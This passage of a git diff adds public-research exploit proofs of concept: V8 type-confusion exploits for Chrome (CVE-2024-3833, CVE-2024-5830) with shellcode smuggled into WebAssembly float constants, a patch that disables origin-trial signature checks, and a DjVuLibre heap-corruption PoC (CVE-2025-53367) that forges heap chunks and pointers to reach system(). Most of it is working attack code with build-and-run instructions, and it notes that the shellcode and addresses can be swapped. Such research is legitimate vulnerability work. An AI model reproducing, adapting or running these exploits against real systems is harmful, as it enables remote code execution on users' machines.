+ char line[1000];
+ char *linep = line;
+ linep += sprintf(linep, "%08lx ", byte_offset);
+ for (int i=0; i<16; i++) {
+ if (i >= line_bytes) {
+ linep += sprintf(linep, " ");
+ } else {
+ linep += sprintf(linep, "%02hhx ", bytes[i]);
+ }
+ }
+ linep += sprintf(linep, " |");
+ for (int i=0; i> 1);
+ console.log("func Addr: " + funcAddr.toString(16));
+ var dblOffset = (oobDbl2Index - oobDblIndex - 5) >> 1;
+ var codeAddr = read(funcAddr + 0x10, dblOffset)[0];
+ console.log("code Addr: " + codeAddr.toString(16));
+ var maglevAddr = read(codeAddr + 0x8, dblOffset);
+ console.log("maglev Addr: " + maglevAddr[0].toString(16) + " " + maglevAddr[1].toString(16));
+ write(codeAddr + 0x8, maglevAddr[0] + 0x80 + 2, maglevAddr[1], dblOffset);
+ func();
+}
diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md b/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md
new file mode 100644
index 0000000..d06634c
--- /dev/null
+++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md
@@ -0,0 +1,23 @@
+## V8 type confusion CVE-2024-3833
+
+The analysis of this bug can be found [here](https://github.blog/2024-06-26-attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties).
+
+The exploit here is tested on the official build of Chrome version 123.0.6312.58, on Ubuntu 22.04. The following build config was used to build Chromium:
+
+```
+is_debug = false
+symbol_level = 1
+blink_symbol_level = 1
+dcheck_always_on = false
+is_official_build = true
+chrome_pgo_phase = 0
+v8_symbol_level = 1
+```
+
+The bug depends on an origin trial; to emulate it locally, the patch `trial-token.patch` should be applied before building Chrome.
+
+If successful, on Ubuntu 22.04, it should launch `xcalc` when `wasm_poc.html` is opened in Chrome.
+
+Shell code and some addresses may need changing on other platforms.
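+As a rough sketch, the local build-and-test workflow looks like this (assuming a Chromium checkout at the matching version tag and the usual depot_tools setup; the output directory name is arbitrary):
+
+```
+cd chromium/src
+git apply trial-token.patch
+gn gen out/release # put the build config listed above into out/release/args.gn
+autoninja -C out/release chrome
+out/release/chrome wasm_poc.html
+```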
+ + diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/import_shell.js b/SecurityExploits/Chrome/v8/CVE_2024_3833/import_shell.js new file mode 100644 index 0000000..86cc811 --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/import_shell.js @@ -0,0 +1,91 @@ +d8.file.execute("/home/mmo/chrome_pocs/v8_test/wasm/wasm-module-builder.js"); + +const importObject = { + imports: { imported_func : Math.sin}, +}; + + +var builder = new WasmModuleBuilder(); +let array = builder.addArray(kWasmF64, true); + +var sig_index = builder.addType(kSig_d_d); + +builder.addImport("imports", "imported_func", sig_index); +builder.addFunction("main", sig_index) + .addBody([kExprLocalGet, 0, kExprCallFunction, 0]) + .exportAs("main"); +//jumps: 0x45, 0x48 for d8 +//0x1d, 0x20 for chrome +builder.addFunction("make_array", makeSig([], [wasmRefNullType(array)])) + .addLocals(wasmRefNullType(array), 1) + .addBody([kExprI32Const, 18, kGCPrefix, kExprArrayNewDefault, array, kExprLocalSet, 0, + kExprLocalGet, 0, + kExprI32Const, 0, + kExprF64Const, 0x31, 0xf6, 0x31, 0xd2, 0x31, 0xc0, 0xeb, 0x1d, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 1, + kExprF64Const, 0x68, 0x6c, 0x63, 0x00, 0x00, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 2, + kExprF64Const, 0x68, 0x2f, 0x78, 0x63, 0x61, 0x58, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 3, + kExprF64Const, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x5b, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 4, + kExprF64Const, 0x90, 0x90, 0x48, 0xc1, 0xe0, 0x20, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 5, + kExprF64Const, 0x48, 0x01, 0xd8, 0x50, 0x54, 0x5f, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 6, + kExprF64Const, 0x56, 0x57, 0x54, 0x5e, 0x90, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 7, + kExprF64Const, 0x68, 0x3a, 0x30, 0x2e, 0x30, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 8, + kExprF64Const, 0x68, 0x4c, 0x41, 0x59, 0x3d, 0x58, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 9, + kExprF64Const, 0x68, 0x44, 0x49, 0x53, 0x50, 0x5b, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 10, + kExprF64Const, 0x90, 0x48, 0xc1, 0xe0, 0x20, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 11, + kExprF64Const, 0x48, 0x01, 0xd8, 0x50, 0x54, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 12, + kExprF64Const, 0x41, 0x5a, 0x52, 0x41, 0x52, 0x54, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 13, + kExprF64Const, 0x5a, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 14, + kExprF64Const, 0x0f, 0x05, 0x5a, 0x31, 0xd2, 0x52, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0]) + .exportFunc(); + +var wasmBuffer = builder.toBuffer(false); +var bufStr = '[' +for (let i = 0; i < wasmBuffer.length - 1; i++) { + bufStr += wasmBuffer[i] + ','; +} +bufStr += wasmBuffer[wasmBuffer.length - 1] + ']'; +console.log(bufStr); diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch b/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch new file mode 100644 index 0000000..ba36da5 --- /dev/null +++ 
b/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch
@@ -0,0 +1,31 @@
+diff --git a/third_party/blink/common/origin_trials/trial_token.cc b/third_party/blink/common/origin_trials/trial_token.cc
+index e3a28923fce19..70c24dd445066 100644
+--- a/third_party/blink/common/origin_trials/trial_token.cc
++++ b/third_party/blink/common/origin_trials/trial_token.cc
+@@ -116,6 +116,17 @@ OriginTrialTokenStatus TrialToken::Extract(
+ std::string* out_token_payload,
+ std::string* out_token_signature,
+ uint8_t* out_token_version) {
++
++ if (token_text.length() > kMaxTokenSize || public_key.size() == 0 || token_text.length() < kPayloadOffset) {
++ return OriginTrialTokenStatus::kMalformed;
++ }
++
++ *out_token_payload = token_text;
++ *out_token_signature = "1234";
++ *out_token_version = kVersion2;
++ return OriginTrialTokenStatus::kSuccess;
++
++/*
+ if (token_text.empty()) {
+ return OriginTrialTokenStatus::kMalformed;
+ }
+@@ -178,6 +189,7 @@ OriginTrialTokenStatus TrialToken::Extract(
+ *out_token_payload = token_contents.substr(kPayloadOffset, payload_length);
+ *out_token_signature = std::string(signature);
+ return OriginTrialTokenStatus::kSuccess;
++ */
+ }
+
+ // static
+--
diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/wasm_poc.html b/SecurityExploits/Chrome/v8/CVE_2024_3833/wasm_poc.html
new file mode 100644
index 0000000..03013d8
--- /dev/null
+++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/wasm_poc.html
@@ -0,0 +1,201 @@
+
+
+
+
+
diff --git a/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md b/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md
new file mode 100644
index 0000000..c4886cc
--- /dev/null
+++ b/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md
@@ -0,0 +1,21 @@
+## V8 type confusion CVE-2024-5830
+
+The analysis of this bug can be found [here](https://github.blog/2024-08-13-from-object-transition-to-rce-in-the-chrome-renderer).
+
+The exploit here is tested on the official build of Chrome version 125.0.6422.112, on Ubuntu 22.04. The following build config was used to build Chromium:
+
+```
+is_debug = false
+symbol_level = 1
+blink_symbol_level = 1
+dcheck_always_on = false
+is_official_build = true
+chrome_pgo_phase = 0
+v8_symbol_level = 1
+```
+
+If successful, on Ubuntu 22.04, it should launch `xcalc` when `calc.html` is opened in Chrome.
+
+Shell code and some addresses may need changing on other platforms.
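+No Chromium patch is needed for this one, so a quick way to reproduce is to point the matching official build directly at the PoC (assuming it is installed as `google-chrome-stable`, the usual binary name on Ubuntu):
+
+```
+google-chrome-stable --version # should report 125.0.6422.112
+google-chrome-stable calc.html
+```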
+ + diff --git a/SecurityExploits/Chrome/v8/CVE_2024_5830/calc.html b/SecurityExploits/Chrome/v8/CVE_2024_5830/calc.html new file mode 100644 index 0000000..6370e6d --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_5830/calc.html @@ -0,0 +1,197 @@ + + + + + diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/DjVuLibre-poc-CVE-2025-53367.diff b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/DjVuLibre-poc-CVE-2025-53367.diff new file mode 100644 index 0000000..8104f7d --- /dev/null +++ b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/DjVuLibre-poc-CVE-2025-53367.diff @@ -0,0 +1,1883 @@ +diff --git a/config/acinclude.m4 b/config/acinclude.m4 +index 19b7e6e..472cf07 100644 +--- a/config/acinclude.m4 ++++ b/config/acinclude.m4 +@@ -96,8 +96,8 @@ AC_DEFUN([AC_OPTIMIZE],[ + AC_REMOVE_OPTIONS([CXXFLAGS],[-g*]) + fi + defines="-DNDEBUG" +- AC_CHECK_CC_OPT([-O3],,[AC_CHECK_CC_OPT([-O2])]) +- AC_CHECK_CXX_OPT([-O3],,[AC_CHECK_CXX_OPT([-O2])]) ++ AC_CHECK_CC_OPT([-O0],,[AC_CHECK_CC_OPT([-O0])]) ++ AC_CHECK_CXX_OPT([-O0],,[AC_CHECK_CXX_OPT([-O0])]) + cpu=`uname -m 2>/dev/null` + test -z "$cpu" && cpu=${host_cpu} + case "${host_cpu}" in +diff --git a/libdjvu/JB2EncodeCodec.cpp b/libdjvu/JB2EncodeCodec.cpp +index 8b3671c..63c70aa 100644 +--- a/libdjvu/JB2EncodeCodec.cpp ++++ b/libdjvu/JB2EncodeCodec.cpp +@@ -377,6 +377,13 @@ JB2Dict::JB2Codec::Encode::code(const GP &gjim) + for (shapeno=firstshape; shapeno= 0) +@@ -390,6 +397,13 @@ JB2Dict::JB2Codec::Encode::code(const GP &gjim) + code_record(rectype, 0, 0); + } + } ++ if (jim.encode_shape_cb) { ++ jim.encode_shape_cb(); ++ } ++ // Code Comment. ++ rectype = PRESERVED_COMMENT; ++ if (!! jim.comment) ++ code_record(rectype, gjim, 0); + // Code end of data record + rectype = END_OF_DATA; + code_record(rectype, gjim, 0); +diff --git a/libdjvu/JB2Image.h b/libdjvu/JB2Image.h +index a87a83b..b88923b 100644 +--- a/libdjvu/JB2Image.h ++++ b/libdjvu/JB2Image.h +@@ -170,6 +170,7 @@ + + #include "GString.h" + #include "ZPCodec.h" ++#include "functional" + + + #ifdef HAVE_NAMESPACES +@@ -318,6 +319,9 @@ public: + /** Comment string coded by JB2 file. */ + GUTF8String comment; + ++ // Extra callback during encoding, so that I can modify the comment. ++ std::function encode_shape_cb = {}; ++ + + private: + friend class JB2Codec; +diff --git a/tools/c44.cpp b/tools/c44.cpp +index df73468..145caff 100644 +--- a/tools/c44.cpp ++++ b/tools/c44.cpp +@@ -211,6 +211,8 @@ + //@{ + //@} + ++#include ++#include + #include "GString.h" + #include "GException.h" + #include "IW44Image.h" +@@ -223,566 +225,1267 @@ + #include "DjVuMessage.h" + #include "JPEGDecoder.h" + #include "common.h" ++#include "JB2Image.h" ++#include ++#include ++#include + +-// command line data +- +-int flag_mask = 0; +-int flag_bpp = 0; +-int flag_size = 0; +-int flag_percent = 0; +-int flag_slice = 0; +-int flag_decibel = 0; +-int flag_crcbdelay = -1; +-int flag_crcbmode = -1; +-double flag_dbfrac = -1; +-int flag_dpi = -1; +-double flag_gamma = -1; +-int argc_bpp = 0; +-int argc_size = 0; +-int argc_slice = 0; +-int argc_decibel = 0; +-IW44Image::CRCBMode arg_crcbmode = IW44Image::CRCBnormal; +- +-#define MAXCHUNKS 64 +-float argv_bpp[MAXCHUNKS]; +-int argv_size[MAXCHUNKS]; +-int argv_slice[MAXCHUNKS]; +-float argv_decibel[MAXCHUNKS]; +- +-struct C44Global +-{ +- // Globals that need static initialization +- // are grouped here to work around broken compilers. 
+- GURL pnmurl; +- GURL iw4url; +- GURL mskurl; +- IWEncoderParms parms[MAXCHUNKS]; +-}; +- +-static C44Global& g(void) +-{ +- static C44Global g; +- return g; +-} +- +- +-// parse arguments +- +-void +-usage() +-{ +- DjVuPrintErrorUTF8( +-#ifdef DJVULIBRE_VERSION +- "C44 --- DjVuLibre-" DJVULIBRE_VERSION "\n" +-#endif +- "Image compression utility using IW44 wavelets\n\n" +- "Usage: c44 [options] pnm-or-jpeg-file [djvufile]\n" +- "Options:\n" +- " -slice n+...+n -- select an increasing sequence of data slices\n" +- " expressed as integers ranging from 1 to 140.\n" +- " -bpp n,..,n -- select a increasing sequence of bitrates\n" +- " for building progressive file (in bits per pixel).\n" +- " -size n,..,n -- select an increasing sequence of minimal sizes\n" +- " for building progressive files (expressed in bytes).\n" +- " -percent n,..,n -- selects the percentage of original file size\n" +- " for building progressive file.\n" +- " -decibel n,..,n -- select an increasing sequence of luminance error\n" +- " expressed as decibels (ranging from 16 to 50).\n" +- " -dbfrac frac -- restrict decibel estimation to a fraction of\n" +- " the most misrepresented 32x32 blocks\n" +- " -mask pbmfile -- select bitmask specifying image zone to encode\n" +- " with minimal bitrate. (default none)\n" +- " -dpi n -- sets the image resolution\n" +- " -gamma n -- sets the image gamma correction\n" +- " -crcbfull -- encode chrominance with highest quality\n" +- " -crcbnormal -- encode chrominance with normal resolution (default)\n" +- " -crcbhalf -- encode chrominance with half resolution\n" +- " -crcbnone -- do not encode chrominance at all\n" +- " -crcbdelay n -- select chrominance coding delay (default 10)\n" +- " for -crcbnormal and -crcbhalf modes\n" +- "\n"); +- exit(1); +-} +- +- +- +-void +-parse_bpp(const char *q) +-{ +- flag_bpp = 1; +- argc_bpp = 0; +- double lastx = 0; +- while (*q) +- { +- char *ptr; +- double x = strtod(q, &ptr); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.bitrate_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x<=0 || x>24 || x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.bitrate_too_many") ); +- } +- if (argc_bpp < 1) +- G_THROW( ERR_MSG("c44.bitrate_no_chunks") ); +-} +- +- +-void +-parse_size(const char *q) +-{ +- flag_size = 1; +- argc_size = 0; +- int lastx = 0; +- while (*q) +- { +- char *ptr; +- int x = strtol(q, &ptr, 10); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.size_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.size_too_many") ); +- } +- if (argc_size < 1) +- G_THROW( ERR_MSG("c44.size_no_chunks") ); +-} +- +-void +-parse_slice(const char *q) +-{ +- flag_slice = 1; +- argc_slice = 0; +- int lastx = 0; +- while (*q) +- { +- char *ptr; +- int x = strtol(q, &ptr, 10); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.slice_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x<1 || x>1000 || x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.slice_too_many") ); +- } +- if (argc_slice < 1) +- G_THROW( ERR_MSG("c44.slice_no_chunks") ); +-} +- +- +-void +-parse_decibel(const char *q) +-{ +- flag_decibel = 1; +- argc_decibel = 0; +- double lastx = 0; +- while (*q) +- { +- char *ptr; +- double x = strtod(q, &ptr); +- if (ptr == q) +- G_THROW( ERR_MSG("c44.decibel_not_number") ); +- if (lastx>0 && q[-1]=='+') +- x += lastx; +- if (x<16 || x>50 || x=MAXCHUNKS) +- G_THROW( ERR_MSG("c44.decibel_too_many") ); ++static void djbz_bitmap(JB2Dict &d, int nrows, int ncols, int bytes_per_row) { ++ JB2Shape shape; ++ shape.parent 
= -1; ++ shape.userdata = 0; ++ shape.bits = GBitmap::create(nrows, ncols, 4); ++ for (int i = 0; i < nrows; i++) { ++ for (int j = 0; j < ncols; j++) { ++ (*shape.bits)[i][j] = ++ j + 1 < bytes_per_row ? (j & 1) : (bytes_per_row & 1); + } +- if (argc_decibel < 1) +- G_THROW( ERR_MSG("c44.decibel_no_chunks") ); +-} +- +- +-int +-resolve_quality(int npix) +-{ +- // Convert ratio specification into size specification +- if (flag_bpp) +- { +- if (flag_size) +- G_THROW( ERR_MSG("c44.exclusive") ); +- flag_size = flag_bpp; +- argc_size = argc_bpp; +- for (int i=0; i 0); ++ buf[0] = 0; ++ } ++ ++ size_t bitoffset() const { return offset_; } ++ size_t byteoffset() const { return (offset_ + 7) / 8; } ++ ++ void write(uint8_t x, size_t nbits); ++ ++private: ++ void write_bitcode(const BitCode table[], size_t tablelen, uint32_t value); ++ ++public: ++ void write_wcode(uint32_t value) { ++ write_bitcode(wcodes, sizeof(wcodes) / sizeof(BitCode), value); ++ } ++ ++ void write_bcode(uint32_t value) { ++ write_bitcode(bcodes, sizeof(bcodes) / sizeof(BitCode), value); ++ } ++}; ++ ++void BitPacker::write(uint8_t x, size_t nbits) { ++ assert(nbits <= 8); ++ assert(x >> nbits == 0); ++ ++ // Shift bits to the top of the byte. ++ x <<= (8 - nbits); ++ ++ // The number of bits that have already been written to the current byte. ++ // Note: bits are written to the top of the byte first. ++ const size_t occupied = offset_ % 8; ++ ++ buf_[offset_ / 8] |= (x >> occupied); ++ offset_ += nbits; ++ if (occupied + nbits >= 8) { ++ if (offset_ / 8 >= bufsize_) { ++ G_THROW(ERR_MSG("BitPacker: buffer too small")); + } +- // Complete short specifications +- while (argc_size < nchunk) +- argv_size[argc_size++] = 0; +- while (argc_slice < nchunk) +- argv_slice[argc_slice++] = 0; +- while (argc_decibel < nchunk) +- argv_decibel[argc_decibel++] = 0.0; +- // Fill parm structure +- for(int i=0; i value) { ++ high = mid; ++ } else { ++ low = mid + 1; ++ } + } +- // Return number of chunks +- return nchunk; +-} +- +- +-void +-parse(GArray &argv) +-{ +- const int argc=argv.hbound()+1; +- for (int i=1; i= argc) +- G_THROW( ERR_MSG("c44.no_bpp_arg") ); +- if (flag_bpp || flag_size) +- G_THROW( ERR_MSG("c44.multiple_bitrate") ); +- parse_size(argv[i]); +- flag_percent = 1; +- } +- else if (argv[i] == "-bpp") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_bpp_arg") ); +- if (flag_bpp || flag_size) +- G_THROW( ERR_MSG("c44.multiple_bitrate") ); +- parse_bpp(argv[i]); +- } +- else if (argv[i] == "-size") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_size_arg") ); +- if (flag_bpp || flag_size) +- G_THROW( ERR_MSG("c44.multiple_size") ); +- parse_size(argv[i]); +- } +- else if (argv[i] == "-decibel") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_decibel_arg") ); +- if (flag_decibel) +- G_THROW( ERR_MSG("c44.multiple_decibel") ); +- parse_decibel(argv[i]); +- } +- else if (argv[i] == "-slice") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_slice_arg") ); +- if (flag_slice) +- G_THROW( ERR_MSG("c44.multiple_slice") ); +- parse_slice(argv[i]); +- } +- else if (argv[i] == "-mask") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_mask_arg") ); +- if (! 
g().mskurl.is_empty()) +- G_THROW( ERR_MSG("c44.multiple_mask") ); +- g().mskurl = GURL::Filename::UTF8(argv[i]); +- } +- else if (argv[i] == "-dbfrac") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_dbfrac_arg") ); +- if (flag_dbfrac>0) +- G_THROW( ERR_MSG("c44.multiple_dbfrac") ); +- char *ptr; +- flag_dbfrac = strtod(argv[i], &ptr); +- if (flag_dbfrac<=0 || flag_dbfrac>1 || *ptr) +- G_THROW( ERR_MSG("c44.illegal_dbfrac") ); +- } +- else if (argv[i] == "-crcbnone") +- { +- if (flag_crcbmode>=0 || flag_crcbdelay>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbdelay = flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBnone; +- } +- else if (argv[i] == "-crcbhalf") +- { +- if (flag_crcbmode>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBhalf; +- } +- else if (argv[i] == "-crcbnormal") +- { +- if (flag_crcbmode>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBnormal; +- } +- else if (argv[i] == "-crcbfull") +- { +- if (flag_crcbmode>=0 || flag_crcbdelay>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- flag_crcbdelay = flag_crcbmode = 0; +- arg_crcbmode = IW44Image::CRCBfull; +- } +- else if (argv[i] == "-crcbdelay") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_crcbdelay_arg") ); +- if (flag_crcbdelay>=0) +- G_THROW( ERR_MSG("c44.incompatable_chrominance") ); +- char *ptr; +- flag_crcbdelay = strtol(argv[i], &ptr, 10); +- if (*ptr || flag_crcbdelay<0 || flag_crcbdelay>=100) +- G_THROW( ERR_MSG("c44.illegal_crcbdelay") ); +- } +- else if (argv[i] == "-dpi") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_dpi_arg") ); +- if (flag_dpi>0) +- G_THROW( ERR_MSG("c44.duplicate_dpi") ); +- char *ptr; +- flag_dpi = strtol(argv[i], &ptr, 10); +- if (*ptr || flag_dpi<25 || flag_dpi>4800) +- G_THROW( ERR_MSG("c44.illegal_dpi") ); +- } +- else if (argv[i] == "-gamma") +- { +- if (++i >= argc) +- G_THROW( ERR_MSG("c44.no_gamma_arg") ); +- if (flag_gamma > 0) +- G_THROW( ERR_MSG("c44.duplicate_gamma") ); +- char *ptr; +- flag_gamma = strtod(argv[i], &ptr); +- if (*ptr || flag_gamma<=0.25 || flag_gamma>=5) +- G_THROW( ERR_MSG("c44.illegal_gamma") ); +- } +- else +- usage(); +- } +- else if (g().pnmurl.is_empty()) +- g().pnmurl = GURL::Filename::UTF8(argv[i]); +- else if (g().iw4url.is_empty()) +- g().iw4url = GURL::Filename::UTF8(argv[i]); +- else +- usage(); ++ assert(high > 0); ++ const size_t i = high - 1; ++ assert(table[i].value <= value); ++ if (table[i].codelen > 8) { ++ write(0, table[i].codelen - 8); ++ write(table[i].code, 8); ++ } else { ++ write(table[i].code, table[i].codelen); + } +- if (g().pnmurl.is_empty()) +- usage(); +- if (g().iw4url.is_empty()) +- { +- GURL codebase=g().pnmurl.base(); +- GUTF8String base = g().pnmurl.fname(); +- int dot = base.rsearch('.'); +- if (dot >= 1) +- base = base.substr(0,dot); +- const char *ext=".djvu"; +- g().iw4url = GURL::UTF8(base+ext,codebase); ++ if (value < 64) { ++ break; + } ++ value -= table[i].value; ++ } + } + ++// The heap feng shui phase aims to preload the tcache with several ++// chunks that are next to each other in memory, and that will get ++// used later when jimg, prevruns, lineruns, and dcd are ++// allocated. So, even though the exact offsets of these chunks within ++// the thread-local arena are unreliable, the distances between them ++// should be. 
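An illustrative aside (not part of the patch): the distance-stability property this comment relies on can be observed with a small standalone glibc program along the following lines. The chunk count, the 0x1f8 request size, and the printed distance are assumptions for the demo, not values taken from the exploit.

```cpp
#include <cstdio>
#include <cstdlib>

int main() {
  enum { N = 4, SZ = 0x1f8 };  // request size small enough for a tcache bin
  void *p[N];
  for (int i = 0; i < N; i++) p[i] = malloc(SZ);  // adjacent chunks
  void *barrier = malloc(SZ);  // defensive: keeps the run off the top chunk
  for (int i = 0; i < N; i++) free(p[i]);         // preload the tcache
  // Allocations of SZ are now served from the tcache (LIFO), so the
  // distance between consecutive allocations is reproducible across runs
  // even though the absolute addresses are not.
  char *a = (char *)malloc(SZ);
  char *b = (char *)malloc(SZ);
  printf("a=%p b=%p distance=%td\n", (void *)a, (void *)b, a - b);
  free(a); free(b); free(barrier);
  return 0;
}
```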
++static const uint16_t distance_jimg_to_dcd = 0x700; ++static const uint16_t distance_prevruns_to_dcd = 0x590; ++static const uint16_t distance_lineruns_to_dcd = 0x370; + ++static const uint16_t sizeof_fake_chunk = 0xa0; ++static const uint16_t sizeof_GBitmap = 0x80; + +-GP<GBitmap> +-getmask(int w, int h) +-{ +- GP<GBitmap> msk8; +- if (! g().mskurl.is_empty()) +- { +- GP<ByteStream> mbs=ByteStream::create(g().mskurl,"rb"); +- msk8 = GBitmap::create(*mbs); +- if (msk8->columns() != (unsigned int)w || +- msk8->rows() != (unsigned int)h ) +- G_THROW( ERR_MSG("c44.different_size") ); +- } +- return msk8; ++// The heap feng shui stage allocates a lot of memory that will never ++// be used again in the 0x31000..0x38000 range (approximately) of the ++// thread-local arena, so I can use it as a scratch area for things ++// like creating fake chunks. The exact offsets might vary slightly ++// from one run to the next, but it should be very reliable if I stay ++// away from the edges. ++static const uint16_t offsetof_scratch_area = 0x2000; ++ ++// Location for storing a pointer to dcd, so that I can calculate ++// pointers to jimg or dcd whenever I need to. ++static const uint16_t offsetof_dcd_ptr_backup = offsetof_scratch_area + 0x20; ++ ++static const uint16_t offsetof_fake_bytes_data = offsetof_dcd_ptr_backup + 0x10; ++static const uint16_t offsetof_fake_rlerows = offsetof_fake_bytes_data + 0x10; ++static const uint16_t offsetof_scratch_ptr = offsetof_fake_rlerows + 0x30; ++ ++// Locations for storing the components of an arena pointer, so ++// that I can use copy_uint16 to forge fake pointers. ++static const uint16_t arena_ptrbytes_2_3 = offsetof_scratch_ptr + 0x30; ++static const uint16_t arena_ptrbytes_4_5 = arena_ptrbytes_2_3 + 0x10; ++ ++// Locations for storing the components of the jimg->blits.traits ++// pointer, so that I can use copy_uint16 to reconstruct it later. ++static const uint16_t traits_ptrbytes_0_1 = arena_ptrbytes_4_5 + 0x10; ++static const uint16_t traits_ptrbytes_2_3 = traits_ptrbytes_0_1 + 0x10; ++static const uint16_t traits_ptrbytes_4_5 = traits_ptrbytes_2_3 + 0x10; ++ ++// Scratch area for the add-with-carry operation. ++static const uint16_t offsetof_adder_area = traits_ptrbytes_4_5 + 0x20; ++ ++static const uint16_t offsetof_fake_bitmap = offsetof_adder_area + 0x20; ++static const uint16_t offsetof_fake_chunk1 = ++ offsetof_fake_bitmap + sizeof_GBitmap + 0x10; ++static const uint16_t offsetof_fake_chunk2 = ++ offsetof_fake_chunk1 + sizeof_fake_chunk + 0x10; ++ ++static const uint16_t offsetof_scratch_area_end = ++ offsetof_fake_chunk2 + sizeof_fake_chunk + 0x30; ++ ++// Location where I'll write the command for system to run. ++// fake_chunk2 contains the fake traits when the command is written. ++// The fake traits are 0x28 bytes, so 0x40 is enough of a gap.
++static const uint16_t offsetof_command = offsetof_fake_chunk2 + 0x40; ++ ++// Struct field offsets ++static const uint16_t offsetof_dcd_count = 0x8; ++static const uint16_t offsetof_dcd_width = 0xc; ++static const uint16_t offsetof_dcd_lineruns = 0x38; ++static const uint16_t offsetof_dcd_prevruns = 0x50; ++ ++static const uint16_t offsetof_blits_traits = 0x78; ++static const uint16_t offsetof_blits_data = 0x80; ++ ++static const uint16_t offsetof_bytes = 0x18; ++static const uint16_t offsetof_bytes_data = 0x20; ++static const uint16_t offsetof_rle = 0x38; ++static const uint16_t offsetof_grle = 0x40; ++static const uint16_t offsetof_grlerows = 0x58; ++static const uint16_t offsetof_rlelength = 0x68; ++static const uint16_t offsetof_monitorptr = 0x70; ++ ++static void write_V0(BitPacker &packer) { ++ packer.write(1, 1); // V0 ++} ++ ++static void write_VL1(BitPacker &packer) { ++ packer.write(0x2, 3); // VL1 ++} ++ ++static void write_P(BitPacker &packer) { ++ packer.write(0x1, 4); // P ++} ++ ++// Write a H element to an even numbered address. ++static void write_H_even(BitPacker &packer, uint32_t lo, uint32_t hi) { ++ packer.write(1, 3); // H ++ packer.write_wcode(lo); ++ packer.write_bcode(hi); + } + ++// Write a H element to an odd numbered address. ++static void write_H_odd(BitPacker &packer, uint32_t lo, uint32_t hi) { ++ packer.write(1, 3); // H ++ packer.write_bcode(lo); ++ packer.write_wcode(hi); ++} ++ ++static void firstrun(BitPacker &packer, size_t &lineno, uint32_t width, ++ uint16_t blocksize, uint16_t blocksperline) { ++ uint32_t remainder = width; ++ for (uint16_t i = 0; i + 1 < blocksperline; i++) { ++ write_H_even(packer, 0, blocksize); ++ remainder -= blocksize; ++ } ++ write_H_even(packer, 0, remainder); ++ lineno++; ++} ++ ++static void write_stop(BitPacker &packer, size_t &lineno, uint32_t stop) { ++ write_H_even(packer, stop, 0x0); ++ lineno++; ++} ++ ++static void modify_prevruns(BitPacker &packer, size_t 